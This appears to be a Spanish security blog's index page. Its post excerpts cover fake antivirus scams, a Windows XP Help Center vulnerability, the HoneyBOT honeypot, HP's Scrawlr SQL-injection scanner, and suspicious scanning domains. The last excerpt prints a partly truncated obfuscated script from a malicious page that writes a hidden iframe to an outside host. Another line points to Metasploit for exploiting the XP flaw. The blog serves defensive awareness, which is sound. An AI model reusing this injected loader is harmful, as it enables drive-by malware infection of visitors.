Los falsos Antivirus, también llamados Rogueware, FakeAV… no es algo nuevo, pero mucha gente sigue cayendo en la triquiñuela. Están diseñados para hacer creer al usuario que el sistema está siendo buenamente analizado en busca de malware, ofreciéndole en pantalla un panorama desastroso de infecciones, es decir pretenden hacerte creer que tu sistema está infectado con diferentes tipos de malware ofreciéndote un producto para solucionarlo, cuando obviamente lo que se pretende es proceder a infectarnos descaradamente. Estas cosas pasan, bien porque la web a la que accedemos es una URL maligna en sí, o bien porque la página web a la que accedemos ha sido vulnerada e incorpora por ejemplo un marco incorporado maligno (iframe). En la imagen podéis ver la URL a la que redirige:

-Pinche para ampliar-

El escenario podría ser el siguiente:

Te encuentras navegando por la inmensa red, cuando al acceder a una URL en concreto salta un mensaje parecido a éste:

Read the rest of this entry

La vulnerabilidad, conocida desde mediados de junio de 2010 y descubierta por Travis Ormandy, un ingeniero de Google, no fue tomada con mayor preocupación por Microsoft, al menos hasta ahora.

La compañía indicaba que el error, tal como lo mostraba Ormandy, no era de mayor importancia para los usuarios. Sin embargo, en los últimos días se han empezado a detectar ataques reales a través de dicho bug, para el cuál hasta el momento no existe parche automático (vía Windows Update)  para remendarlo, aunque ya hay un Fix a disposición de los usuarios desde la web de microsoft.

El sistema de ayuda integrado en Windows XP, está creado con la idea de brindar soporte a distancia a sus usuarios, y es parte del propio sistema operativo.

En las últimas horas, se calculan más de 10.000 máquinas atacadas utilizando esta vulnerabilidad, para explotarla solo debes lanzarla desde Metasploit.

Según el propio blog de seguridad de Microsoft, a través de las máquinas atacadas exitosamente, se están distribuyendo otros troyanos y malwares similares. Esto podría facilitar la creación de nuevas redes de máquinas zombi, aquellas que son “tomadas” por los delincuentes informáticos para su propio provecho, sin que el usuario de las mismas se percate de ello. Read the rest of this entry

HoneyBOT es una solución honeypot de baja interacción para Windows gratuita que podemos instalar con un solo click y sin más complicaciones en un pc de nuestra red local, o en un terminal dedicado, después de su instalación, solamente hay que configurarlo adaptándolo a nuestras necesidades y gustos. (Aunque no se aconseja debido al riesgo que conlleva, también puedes instalarlo en tu ordenador principal o por ejemplo en una máquina virtual).

¿Qué es un Honeypot?

Un honeypot es un dispositivo que se coloca en una red informática diseñada específicamente para capturar tráfico de red malicioso. La capacidad de registro de un honeypot es mucho mayor que cualquier otra herramienta de seguridad de red y otros datos a nivel de capturas raw incluso incluyendo las pulsaciones y errores cometidos por los piratas informáticos. La información capturada es muy valiosa, ya que contiene sólo el tráfico malicioso con poca o sin falsos positivos.
Honeypots se están convirtiendo en una de las principales herramientas de seguridad utilizadas para vigilar los últimos trucos y hazañas de los piratas informáticos mediante el registro de todos sus movimientos para que la comunidad de seguridad puede responder más rápidamente a nuevas hazañas.
Read the rest of this entry

Desde el Blog de Mark Painter (The HP Security Laboratory Blog) podemos descargar Scrawlr, una herramienta de HP para sistemas operativos Windows (Quizás con Wine…) que realiza un escáner a tu sitio web en busca de debilidades que puedan facilitar a un atacante una inyección SQL. Después del revuelo de los ataques masivos vía SQL, no está de mas probar ésta herramienta gratuita.

Descarga SCrawlr desde la web oficial de HP rellenando éste formulario.

Más información sobre los ataques masivos aquí:  http://www.computerworld.com/

Scrawlr FAQ:   h30507.www3.hp.com

Otros: PowerPoint de Isabel Gomez y Miguel Jimenez/Defensa_contra_ataques_web_comunes

La web  cindey.com y transkonsult.com.ar últimamente tiene una actividad bastante alta y vienen realizando escáneres a ésta y otras webs en los últimos días:

Los archivos maliciosos, shell, escáner…etc se alojan en el directorio banners: Read the rest of this entry

Ésta página web de supuestos enlaces ed2k, cada vez que es refrescada o cargada intenta inyectar código detectado por las firmas de algunos antivirus como HTML Small.bkr.106, iframe o Trojan.

(<body bgcolor=”#000000″ text=”#000001″><script>sa=”%6B%73%69%65%6E%61%2E%6E%65%74″;eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.rep______(new RegExp(‘\\b’+c.toString(a)+’\\b’,'g’),k[c])}}return p}(‘a(0.4.7(“5=s”)==-1&&9.8.7(“f 6″)!=-1){0.4=”5=s; e=c, 2 g b 2:d:h p; “;0.r(“<3 q=1 t=1 o=\’n://”+j+”/i/\’ k=\’l:m\’></3>”)}’,30,30,’document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015…

…Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height’.split(‘|’)));</script>
<p align=”center” style=”line-height: 0; margin-top: -1; margin-bottom: -1″><font face=”Trebuchet MS” color=”#000000″ style=”font-size: 1pt”>)

El dominio es el siguiente: En la raíz somos redireccionados a éste otro dominio.

Read the rest of this entry